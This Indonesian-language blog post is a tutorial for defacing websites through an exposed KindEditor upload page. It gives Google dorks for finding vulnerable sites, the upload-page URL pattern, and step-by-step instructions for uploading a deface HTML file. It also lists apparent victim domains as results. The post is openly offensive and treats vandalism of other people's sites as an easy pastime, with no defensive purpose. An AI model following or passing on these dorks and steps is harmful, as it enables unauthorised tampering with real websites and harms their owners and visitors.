Cara Deface Website Dengan Teknik Web KindEditor


hari ini saya akan share tutorial Cara Deface Website Dengan Teknik Web KindEditor. Bagi yang suka maen empes-empesan,Aku punya tutorial deface yang ngga terlalu sulit nih, anak SD juga kayanya bisa wkwk :p

Ok, Langsung aja kita mulai defacenya ^^

Masukan Dorknya ke kotak pencarian Google :

inurl:examples/uploadbutton.html
inurl:kindeditor

Exploit :

http://www.contohtarget.com/path/kindeditor/examples/uploadbutton.html

1. Kalo web target udah dapet, kita klik upload,

2. Kemudian pilih HTML defecan kamu. Contoh disini kita menggunakan HTML Aku...Cireboncyber4rt.html

3. Nanti akan keluar URL hasil upload-an HTML kita... copas link tersebut dan letakkan diakhir URL.
4. Kemudian kalo sudah, tekan Enter

5. Taraaa... :D

Hasilnya :

www.daitianyi.netwww.staic.qefeng.com

Gimana, mudahkan? hehehe... Bagi kalian yang masih bingung, silahkan bisa pakai demo upload buttonnya yang sudah saya dapatkan dibawah ini :
Upload Button Example
Semoga tutorial diatas tentang Cara Deface Website Dengan Teknik Web KindEditor bisa bermanfaat bagi kalian sekalian, kurang lebihnya saya mohon maaf, Wassalam.

sumber:cirebon-cyber4rt

Komentar

Posting Komentar

komentar anda sangat berarti bagi kemajuan blog ini!